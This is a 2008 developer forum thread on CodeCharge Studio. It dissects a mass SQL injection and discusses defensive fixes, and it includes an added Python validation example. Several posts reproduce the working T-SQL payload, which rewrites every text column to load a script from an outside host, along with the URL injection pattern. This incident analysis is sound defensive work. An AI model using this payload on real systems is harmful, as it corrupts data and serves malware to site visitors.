YesSoftware Forums -> CodeCharge Studio -> General/Other

 sql injection: your application is not safe


TheunisP

Posts: 342
Posted: 05/19/2008, 4:47 AM

hi guys, wondered if somebody had had the same - we were hit by a sql injection last night - the bugger makes an entry to a js file m.js - just deleted 376 000 something lines - it doesn't seem to add records but rather edit them

all our systems have the normal CCS password protection and all data (admin areas) are protected - so I have no idea how it got through
TheunisP

Posts: 342
Posted: 05/19/2008, 7:33 AM

ok this is what they injected it seems: it follows whatever parameters you have for your page

ps. this is not the complete text, I cut out a whole lot in the middle

TheunisP

Posts: 342
Posted: 05/19/2008, 8:23 AM

quick update: we have confirmed that the injection was done through a page with a grid (not editable grid or record - basic display grid)

reported this to support

tsgroman


Posts: 64
Posted: 05/19/2008, 10:33 AM

TheunisP,

Please keep us updated!
TheunisP

Posts: 342
Posted: 05/19/2008, 11:11 AM

I've figured out that they manage to sneak the SQL through by appending it to a parameter - when CCS builds the WHERE, the second set of SQL statements becomes part of what gets sent to the server - your SELECT executes, followed by the code below - what worries me is that although this code only appends data it doesn't take much to change it to delete data or replace data. The actual attack times out (because the injected update runs for a while - it goes through each and every user table and each and every text/varchar column) - still it managed a decent 370k updates on our server before the time-out

for your info the code that is injected:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.qiqigm.com/m.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

ReneS

Posts: 225
Posted: 05/19/2008, 1:14 PM

Hi,

I found this one: http://www.simple-talk.com/community/blogs/tony_davis/a...4/29/49004.aspx

Are they right?

My question to you is, do you use stored procedures to add/edit/delete to your database?

Rene
TheunisP

Posts: 342
Posted: 05/19/2008, 1:38 PM

Rene, this is not exactly what happens - and no, there are no SPs - this happens in a page with a simple search & grid (there is no record as such on the page for edit/new etc.)

what happens (as far as I can tell from the logs):

the injection got hold of a url, either from a user's pc or from google, where the url had a search parameter in it

e.g.

page.asp?s_Keyword=waarrara

what it did then is to add that piece of code I posted behind it before calling the page e.g.

page.asp?s_Keyword=waarrara';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST......


now when CCS builds the search query (SELECT whatever FROM warra) the injection code gets added afterwards as an additional SQL statement

the SELECT gets executed, then SQL starts with the next statement, e.g. the declare of the local var; it then CAST converts the hex values to a valid statement and then runs it

as you can see from the injection code, it actually reads all of your tables and then retrieves all the text etc. columns and starts appending data.

the weak point and how they get through is by relying on the fact that we don't check search parameters (e.g. the user can search for anything, meaning that we can't really check what they search for - e.g. how do you validate a search term?)

mamboBROWN


Posts: 1713
Posted: 05/19/2008, 7:59 PM

TheunisP
Have you reported this to support?? Assuming what you said is true I am almost sure that they would like to know this information immediately ( http://support.yessoftware.com ).
tsgroman


Posts: 64
Posted: 05/19/2008, 10:25 PM

Yes. He reported this to support: see post, this thread, 05/19/2008, 8:23 AM.

TheunisP,

What did support tell you? Please keep us updated as to what you find out from Yes.
TheunisP

Posts: 342
Posted: 05/20/2008, 7:44 AM

ok, still haven't heard from support but I've found 1 instance so far

CCDLookup

say you pass a parameter and you then use this parameter to do a lookup - the way CCS does these is that it takes your WHERE as is and builds the SQL; now, given the right circumstances, the injection's code will get executed - tested it and I was able to modify and add data

seems we have a couple of solutions e.g.

in the common cddlookup we can check what is passed to the where and stop it there

or (can someone help here) stop MS SQL from executing multiple statements

for the rest of CCS I've tested a couple of scenarios and it seems that CCS, although not by design, stops the injection - you get really nasty SQL errors


TheunisP

Posts: 342
Posted: 05/21/2008, 2:57 AM

Support came back and suggested using the ToSQL() function (something I almost never use) before you use the CCDLookup - I'm going to check my code, make the changes and pray for the best
TheunisP

Posts: 342
Posted: 05/21/2008, 4:45 AM

after looking at the ToSQL function I'm not sure that is gonna work too well

now I know that these injections are done through the lookup - fyi this is the way I'm leaning

to get the key I'm going to replace the normal ccgetparam with

Iif(IsNumeric(CCGetParam("intKeyValue",0)),CCGetParam("intKeyValue",0),0)

this will ensure that if I get a key passed that it is numeric - while if it has garbage in it or is absent I'll get a 0

lwismanuel


Posts: 39
Posted: 05/21/2008, 12:04 PM

According to this site http://hackademix.net/2008/04/26/ a lot of sites have been attacked using that nasty code:
DECLARE @T varchar(255), @C varchar(255);  
DECLARE Table_Cursor CURSOR FOR  
SELECT a.name, b.name  
FROM sysobjects a, syscolumns b  
WHERE a.id = b.id AND a.xtype = 'u' AND  
(b.xtype = 99 OR  
b.xtype = 35 OR  
b.xtype = 231 OR  
b.xtype = 167);  
OPEN Table_Cursor;  
FETCH NEXT FROM Table_Cursor INTO @T, @C;  
WHILE (@@FETCH_STATUS = 0) BEGIN  
EXEC(  
'update [' + @T + '] set [' + @C + '] =  
rtrim(convert(varchar,[' + @C + ']))+  
''<script src=http://evilsite.com/1.js></script>'''  
);  
FETCH NEXT FROM Table_Cursor INTO @T, @C;  
END;  
CLOSE Table_Cursor;  
DEALLOCATE Table_Cursor;
RonB

Posts: 228
Posted: 05/22/2008, 12:11 AM

First off, this is not a problem specific to CodeCharge. It also only touches SQL Server and ASP from what I have read.

A simple clean-up of your search parameters would stop this, or am I mistaken? In PHP I use strip_tags() to clean up search parameters so any PHP and HTML is stripped before being sent to the database. I found this piece of ASP on the web that might do the same in ASP as strip_tags() does for PHP:
Function stripHTML(strHTML)
'Strips the HTML tags from strHTML

  Dim objRegExp, strOutput
  Set objRegExp = New RegExp

  objRegExp.IgnoreCase = True
  objRegExp.Global = True
  objRegExp.Pattern = "<(.|\n)+?>"

  'Replace all HTML tag matches with the empty string
  strOutput = objRegExp.Replace(strHTML, "")

  'Replace any remaining < and > with the entities &lt; and &gt;
  strOutput = Replace(strOutput, "<", "&lt;")
  strOutput = Replace(strOutput, ">", "&gt;")

  stripHTML = strOutput    'Return the value of strOutput

  Set objRegExp = Nothing
End Function


This looks like it would clean up and prevent the attack. I'm no ASP programmer so.....????

Ron
wkempees


Posts: 1679
Posted: 05/22/2008, 3:43 AM

Even the addition of validation to the search fields should be helpful.
Making sure a search field can only accept what is expected, posting an error if not or stripping out the excessive characters.
As to ToSQL(), it is best practice to use that anywhere you have posted values going to the DB.

Walter
_________________
Origin: NL, T:GMT+1 (Forumtime +9)
CCS3/4.01.006 PhP, MySQL .Net/InMotion(Vista/XP, XAMPP)

if you liked this info PAYPAL me: http://donate.consultair.eu
TheunisP

Posts: 342
Posted: 05/22/2008, 4:02 AM

@w have a look at what ToSQL does for numbers - it wouldn't make much difference - either CCS must put an IsNumeric in there - or you will have to do a custom cleanup

@R thanks R, but stripping out the HTML (or js) won't do much in this case
Vasiliy

Posts: 378
Posted: 05/22/2008, 6:46 AM

If someone is interested, we resolved the problem with SQL injections (or I think so :)

Considering that here and there we have calls to SQL Server with parameters, we made a global protection on the web-app level by checking every value of every parameter against its data type.
If a parameter value has characters (or strings) that are not acceptable for this parameter name we either remove this parameter or redirect to an error page.

I created a dictionary of the parameter data types that we can expect from a request.
For example the parameter types are: int, decimal, safestring, savehtml, unsavehtml.

In our web-app every page has 2 include files: header and footer.
In the page header I added a parser that checks every passed parameter for every request.
This parser validates (regex) the data in the parameter value against the data type assigned to the parameter name.

This approach, validating every parameter for the entire web-app, made our app secure against SQL injections.
_________________
Vasiliy
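An added example, not CodeCharge Studio code and not Vasiliy's own implementation, of the per-parameter type dictionary described above, in Python. The parameter names, the type names and the item table are assumptions; it checks the two URL shapes from this thread (a numeric key and a search keyword with statements appended) and pairs the check with a lookup that binds the key as a parameter instead of splicing it into the SQL text.

```python
import re
import sqlite3
from decimal import Decimal
from urllib.parse import urlsplit, unquote_plus

# Hypothetical dictionary in the spirit of the post above: each request parameter
# name is bound to the single data type it is allowed to carry.
PARAM_TYPES = {"intKey": "int", "task_id": "int", "price": "decimal", "s_Keyword": "safestring"}

# Whitelist pattern per type. 'safestring' allows letters, digits, blanks and a few
# punctuation marks; quotes, semicolons and angle brackets are deliberately absent.
TYPE_PATTERNS = {
    "int": re.compile(r"-?\d{1,10}"),
    "decimal": re.compile(r"-?\d{1,12}(\.\d{1,4})?"),
    "safestring": re.compile(r"[\w .,@-]{0,100}"),
}

def parse_query(url):
    """Split the query string on '&' only, so a ';' stays inside the value it was appended to."""
    pairs = []
    for chunk in urlsplit(url).query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def validate_params(url):
    """Return (accepted, rejected): typed values that passed, and a reason for each that did not."""
    accepted, rejected = {}, {}
    for name, value in parse_query(url):
        ptype = PARAM_TYPES.get(name)
        if ptype is None:
            rejected[name] = "unknown parameter"      # not in the dictionary: drop it
        elif not TYPE_PATTERNS[ptype].fullmatch(value):
            rejected[name] = "not a valid " + ptype   # e.g. '999;DECLARE ...' is not an int
        elif ptype == "int":
            accepted[name] = int(value)
        elif ptype == "decimal":
            accepted[name] = Decimal(value)
        else:
            accepted[name] = value
    return accepted, rejected

def demo_db():
    """Constructed in-memory table standing in for the one a CCDLookup would read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO item VALUES (999, 'widget')")
    return conn

def lookup_name(conn, key):
    """The lookup binds the key as a parameter instead of splicing it into the SQL text,
    so even an unvalidated value stays data and cannot start a second statement."""
    row = conn.execute("SELECT name FROM item WHERE id = ?", (key,)).fetchone()
    return row[0] if row else None
```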
CodeChargenewbie

Posts: 114
Posted: 05/22/2008, 7:12 AM

Just my two cents.

Stored procedures would be of help, one would think, as it only takes parameters. And you can conduct a check of said parameters within the procedure, such as checking the length and/or type.

Validations would be helpful, as well. And checking input values before you include them in your embedded sql would also be helpful.

I had thought ToSQL is a construct that allows your sql statement to work for any sql database. I wasn't aware that it had certain protection schemes...

Actually, this is a good link to bookmark for such things:

http://www.devarticles.com/c/a/MySQL/SQL-Injection-Attacks-Are-You-Safe/2/
CodeChargenewbie

Posts: 114
Posted: 05/22/2008, 7:20 AM

Quote Vasiliy:
If someone is interested, we resolved the problem with SQL injections (or I think so :)

Considering that here and there we have calls to SQL Server with parameters, we made a global protection on the web-app level by checking every value of every parameter against its data type.
If a parameter value has characters (or strings) that are not acceptable for this parameter name we either remove this parameter or redirect to an error page.

I created a dictionary of the parameter data types that we can expect from a request.
For example the parameter types are: int, decimal, safestring, savehtml, unsavehtml.

In our web-app every page has 2 include files: header and footer.
In the page header I added a parser that checks every passed parameter for every request.
This parser validates (regex) the data in the parameter value against the data type assigned to the parameter name.

This approach, validating every parameter for the entire web-app, made our app secure against SQL injections.

All?!? How would you know if it's a safe string, which are the worst offenders, imo. Say the user is entering a name or street address in the web app, which will be inserted into the database. How would you ensure its integrity?
TheunisP

Posts: 342
Posted: 05/22/2008, 7:48 AM

@Vasiliy That should do it - as said, the problem was specific to unchecked numerics - if we did a basic check that the type was correct it would have stopped the injection

@CodeChargenewbie In actual fact CCS kinda stops injection via strings/text - so they are lesser offenders in this case - although, having had a look, the injection actually tries to add itself to both a string and a numeric - however in our situation the text one failed time and again to inject, either due to CCS stopping it or our code stopping it


TheunisP

Posts: 342
Posted: 05/22/2008, 8:03 AM

maybe I should just take a sec and explain how it does it - summarize the 1st few posts

the injection attaches a piece of text at the back of your url, after your normal url parameters

so for instance this is how it would look normally:

index.asp?intKey=999

now it attaches this:

;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST{0x44...00%20AS%20NVARCHAR(4000));EXEC(@S);

or

;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST{0x44...00%20AS%20NVARCHAR(4000));EXEC(@S);

(notice the ' in the one and the other)

after the cast you will notice a string that starts with 0x; this is the start of a hex sequence that, if you cast it back to decimal and convert the ascii to chars, will give you a valid set of sql statements

the injection hopes that you will take your url parameter and do something on sql with it without checking the content or type

in essence you will send a statement(s) to sql:

select * from table where key=XXXX

the XXXX is whatever you retrieved from your url parameter

now normally there should only be a numeric value - but after the injection got hold of it you have another couple of sql statements that follow

sql will execute your statement and dutifully start executing the injected statements

the absolute beauty of this attack is that you provide the login for the malware and secondly the script doesn't need to know how your database is structured since the database is going to give it to them

I suppose at this point we can argue that something like the stored procedure that returns your table names and their column names shouldn't be available - point taken but that is a different issue

what scared me is that the script could have deleted the data or dropped the tables, which it didn't - that is a plus

unfortunately the script is so easy to understand that I can promise you - as I type this - a script kiddie is adapting it to do much worse in the future

so I suggest whatever you want to do to protect your systems to do it quick - according to the media the 1st run attacked over 30 000 sites, the second run a conservative estimate put it at over 400 000 sites

Our logs indicated that the script tried it on 6 of our 9 sites - average attacks per server were between 5 and 10 times - variations

and it took only one to change more than 370 000 of our records

lwismanuel


Posts: 39
Posted: 05/23/2008, 1:42 PM

We should know better than to trust user input, and sanitize whatever is passed by the user to our apps. This attack could have been avoided by following some simple security precautions. For instance, the user on my default database connection has read-only permission, so if I have to delete, insert or update I do something like this:
// your existing database connection with read-only credentials
$db = new clsDBConnection();

// Reconnect as a DB user with the right to add a record
// (the five arguments are placeholders for your own connection values)
$db->connect("<database>", "<host>", "<port>", "<user>", "<password>");

// ToSQL() with ccsInteger makes sure both values reach the statement as integers
$SQL = "INSERT INTO report (report_task_id, report_creator) " .
       "VALUES (" . $db->ToSQL(CCGetFromGet("task_id", 0), ccsInteger) . "," . $db->ToSQL(CCGetUserID(), ccsInteger) . ")";

$db->query($SQL);
$db->close();

As I said before, always check user input. If you are querying a record where the field is x amount big in length then why not chop the string at x, or if the string is alphanumeric sanitize the variable for the type of variable you are expecting.

Security should always be a big concern even if the apps we develop do not hold vital data. We all should put our two cents in to develop more secure apps.
Oper


Posts: 1195
Posted: 05/26/2008, 6:47 PM

since we always use ccgetparam to get parameters, and only for odd reasons are search and other parameters greater than 20 or 30 chars, we modified ccgetparam to always cut the return at 25.

not NASA technology, but you don't have to modify anything in your code, and it works perfectly

also at the end of ccgetparam

you could replace "< ( ; > )" since only for odd reasons will these get used

or, better and shorter: for SQL injection the multi-command execution is needed, so just replace ";" (semicolon) with a space.

_________________
http://www.7bz.com (Free CMS,CRM Developed in CCS)

http://www.PremiumWebTemplate.com
Affiliation Web Site Templates

Please do backup first
TheunisP

Posts: 342
Posted: 05/29/2008, 5:59 AM

ok - sorry for not replying on posts (I just don't know why I typed that explanation if nobody reads it before replying)

anyway - an update: Yes sent me an updated common.ccl which they claim will solve the problem - checked now, neither the Lookup nor ToSQL was changed (either one would have fixed it) - so I mailed them back asking if they could point out where the changes are

I should also point out that this was an ASP upgrade component only - while the problem is not just in ASP


BTW - has anyone seen this little padding function in the common library? CCAddZero?

